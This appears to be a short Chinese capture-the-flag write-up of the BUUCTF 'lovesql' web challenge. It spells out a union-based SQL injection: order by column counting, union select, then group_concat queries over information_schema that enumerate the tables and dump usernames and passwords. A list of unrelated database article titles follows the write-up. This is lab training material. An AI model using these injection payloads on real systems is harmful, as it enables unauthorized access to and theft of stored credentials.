47,【5】BUUCTF web lovesql

进入靶场

可知是单引号闭合,属于字符串型注入

则后续方法与字符串型无异

使用order by 判断出字节数为3

使用union select寻找注入点时切记第一个select为空

库名geek

表名group_concat(table_name) from information_schema.tables where table_schema='geek'#

geekuser l0ve1ysq1

字段名group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

id username password

group_concat(column_name) from information_schema.columns where table_name='geekuser'#

可知两个表字段名相同

查询字段内容

group_concat(id,username,password) from geek.l0ve1ysq1#

group_concat(id,username,password) from geek.geekuser#

得到flag

笔记

1,本题考查字符串类型的注入

2,group_concat(id,username,password) from geek.geekuser#

一次可以爆出表格所有内容

相关推荐
maply16 分钟前
Redis 持久化机制:RDB 和 AOF
数据库·redis·缓存·aof·rdb
m0_748241701 小时前
【Redis入门到精通六】在Spring Boot中集成Redis(含配置和操作演示)
数据库·spring boot·redis
ekskef_sef2 小时前
Spring Boot——日志介绍和配置
java·数据库·spring boot
王中阳Go3 小时前
某讯一面,感觉问Redis的难度不是很大
数据库·redis·缓存·面试
万亿少女的梦1683 小时前
基于PHP的校园兼职系统的设计与开发
开发语言·网络·数据库·爬虫·网络安全·php
老马啸西风3 小时前
数据库高可用方案-06-监控与报警
数据库·oracle
码明4 小时前
SpringBoot整合junit
数据库·spring boot·junit
程序研5 小时前
MySQL 数据操作语言 (DML)
数据库·mysql
maply5 小时前
如何使用 Redis 作为高效缓存
数据库·redis·缓存
媤纹琴獣5 小时前
mybatis xml sql
xml·sql·mybatis